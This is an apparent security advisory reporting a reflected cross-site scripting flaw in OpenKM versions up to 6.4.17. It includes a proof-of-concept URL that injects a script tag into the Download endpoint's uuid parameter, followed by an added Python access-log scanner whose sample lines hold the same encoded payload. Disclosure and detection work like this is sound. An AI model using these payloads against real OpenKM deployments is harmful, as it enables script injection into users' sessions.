OpenKM Document Management System Suffers From Cross-Site Scripting Attack
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/openkm.jpg
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Author : Khalil Shreateh <https://www.facebook.com/khalil.shr>
Author Website: http://khalil-shreateh.com
Status : Reported.
Report Link : http://issues.openkm.com/view.php?id=3056
Attack Description
Log in as any user.
Navigate to:
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
POC IMAGE :
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/xss.jpg
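
A defender-side check for the request described above, as an added example that is not part of the original advisory or of OpenKM's code: it scans access-log lines for requests to the Download endpoint whose uuid parameter is not a canonical UUID. The log format, the sample lines and the assumption that legitimate uuid values are canonical 8-4-4-4-12 hex UUIDs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate uuid values are canonical 8-4-4-4-12 hex UUIDs.
UUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DOWNLOAD_PATH = "/OpenKM/frontend/Download"


def suspicious_uuid(target):
    """Return the decoded uuid value if it is not a canonical UUID, else None."""
    parts = urlsplit(target)
    if parts.path != DOWNLOAD_PATH:
        return None
    # parse_qs percent-decodes values; keep_blank_values keeps the bare "export" flag.
    for value in parse_qs(parts.query, keep_blank_values=True).get("uuid", []):
        if not UUID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return a list of (line_number, decoded_value) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_uuid(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - alice [01/Jan/2015:10:00:00 +0000] "GET /OpenKM/frontend/Download?export&uuid=3f2b8c1e-5d4a-4b6f-9e7a-1c2d3e4f5a6b HTTP/1.1" 200 5120',
    '203.0.113.9 - user1 [01/Jan/2015:10:01:00 +0000] "GET /OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 312',
    '203.0.113.9 - user1 [01/Jan/2015:10:02:00 +0000] "GET /OpenKM/login.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-UUID value in uuid parameter: {value!r}")
```

The same allow-list pattern can be applied server-side to reject the request before the value is ever written into a response.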